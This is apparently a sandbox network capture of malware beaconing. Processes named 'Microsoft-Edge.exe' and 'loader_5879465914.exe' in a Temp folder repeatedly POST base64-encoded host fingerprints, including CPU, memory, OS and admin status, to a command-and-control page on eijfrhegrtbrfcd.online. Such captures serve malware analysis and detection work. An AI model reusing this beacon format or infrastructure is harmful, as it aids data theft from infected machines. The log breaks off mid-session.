2024-09-27 15:42:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49764 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:16 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:16 UTC | 650 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:16 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ITfMqrJjYN8hMKRoWE2Y0lgLh5zdMtAB98z5X8Gz3s8EImttvy6NIMyDTyTftjBbygUBzlY0qUi07wPZ6THY6CXSD8eVySRsdJP4naar%2FKX8418pztq%2FnWrMV6QVHCptxBZ7WZFoIyM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a48fe3f185d-EWR
alt-svc: h3=":443"; ma=86400
2024-09-27 15:42:16 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49767 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:17 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:18 UTC | 624 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkA5JI9JP4nXjxeevEUs6zz9LVcQ0WStTt2Lscz6ROePGD05I5sULeuNU36dyZ%2F51Obk7KFwnkSJtF8nQmz%2F8EH2or4xDWuUY%2FesX9mmoF%2BlXQKqISxUYRBryI2e3E0FYwxgDw97A4xk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a51f8cbc402-EWR
2024-09-27 15:42:18 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49768 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:17 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:18 UTC | 620 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RcJ5gHQhldi7qnfSzWTsr2Cph7NnYYD5QvYz%2FKeqxPcKQ5eLc90iq12cFD7pgNsU0Ff0Pv63AbP0wMPX5%2ByJ6cvBpO391XpskG1LQFK38hCqk0HfskftWzi7MEgifyTYnIyS3cqzqhkt"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a524b60726f-EWR
2024-09-27 15:42:18 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49770 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:19 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:19 UTC | 622 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VwFJHoY9pSp5MbB0t1crhJdmR6yLtTGrv4fjW0e2Uk9HL1aE%2BJfVeqYiWOf%2BK9GaipUzI8fboCA7QweG2Ya3H4ltL5hVUN8hMsms8o4coUnbcgiraFcReTniXtpr7%2FEtyFaVphv5Kll"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a59accd8c96-EWR
2024-09-27 15:42:19 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49771 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:19 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:19 UTC | 624 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BGQDdqHM0fSSM4IGenfizZGtsOLm6YJKwW8Ny6VBvHJ7Sv%2B%2BzHeIpAN9Fy4DnUTsFHMsHGfxex85hFAQWgXL%2BU3bjudJsqp1HzHHCm7UC817DlDZnc9bv5hxGYL98rDJxAQiDp%2BxVzfb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a59ecd14379-EWR
2024-09-27 15:42:19 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49773 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:20 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:21 UTC | 620 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTQdRws7pK%2BydJqS3Vy5h1T4N%2FZryMK1idHZk1ypJJy0u1CXBn87ftrM1nTywgovD3QT1cGsYYUUfLgV5d4R8mt3jWSAkWkNtUOKBsKpA5ZZO6c7RGKn5ArhEvFTrl3dTOetVdKoZpf5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a6468b30f98-EWR
2024-09-27 15:42:21 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49774 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:20 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:21 UTC | 624 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:21 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iK34POesKNt0ofC0CBs4c252LzFQtWhNnBh8yitEtKpj2XqGZbO34v%2F9WZUZL7b3D2%2FrXGNWT1KjpjOCEdFYrk2%2F6itXifY0lDxrVD%2Fzmo9RFfzl0O8liQAWp8WDUU9eV8dVU243VFJO"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a646d0a426b-EWR
2024-09-27 15:42:21 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49776 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:22 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:22 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:22 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtbRYelX451JX3HxCTMDmSFd5RIgacvc49F80JBVYrnidw0fz3T8%2FaZht5i73oUwYtWsO%2BylY1MYCjNCUXNw%2FBsOdHMA51GYIWX2Ks2bw%2BP1m96YjM%2BoTm1C0U5noPyk1Urdlna2NFlH"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a6c6ba08cdc-EWR
2024-09-27 15:42:22 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49777 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:22 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:22 UTC | 628 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:22 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UVJ1J%2B9%2BbvnqxwBjzyYVPYSV7rNvVM%2B1plh5duOw0bpAyWSHO3gzJc231Z%2BzQr2LkVtshwM0M2zRIuODgi8LNTkv3jivHiFLuZs1UCVN51DE2WI3nmNmvJ%2FWilXov3VnbJH%2F3mk8K6K7"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a6d5c0fc327-EWR
2024-09-27 15:42:22 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49779 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:23 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:23 UTC | 622 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:23 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2kmJzY%2FaKXT58af1qB9EDtZ2bq8w692dYEdA74KF1qMoYjsTgfhGkOO81GC1tR2awMJ%2FcEaCnwCSyfq2XTGBpLyu%2BYkzkvsDh3W36906HFwi5LvMptdeadc8y08J6BFeYIuVEBPFNGx5"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a747a7342f1-EWR
2024-09-27 15:42:23 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49780 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:23 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:23 UTC | 658 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:23 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1OtNGi%2F%2BQikQ2oXRg7aZSWiAyJhBKylqiDo%2Bk%2B64xfc1UKjGuQVzHXsrQGBB8pTnJBO46pTiT6gxUHfVddXmPJoUW3DPT%2FUXx6bGoYQvcxvY2JRedMvt0844fEX7xn%2BTfhH0pXd33Xle"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a758a8118c0-EWR
    alt-svc: h3=":443"; ma=86400
2024-09-27 15:42:23 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49783 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:26 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:26 UTC | 632 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:26 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yr43LtwcjOvWfR%2FUlW1BnSVuG%2BkT7HdlddHphQqHASU65Lc4xGg%2BctCMXNHDKZSfjkf8Xt%2Fwg1XhzREQUbmo3Ld%2BS5EGg95SgsNZmY%2BnjiVp5PqCE0f6%2F28Wz2%2BqI0ElnefPiCSngwlP"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a85ad7e5e73-EWR
                                                                                                                                                                2024-09-27 15:42:26 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


Session ID: 26 | Source: 192.168.2.4:49782 | Destination: 172.67.187.100:443 | PID: 1748 | Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data

2024-09-27 15:42:26 UTC | 621 | OUT
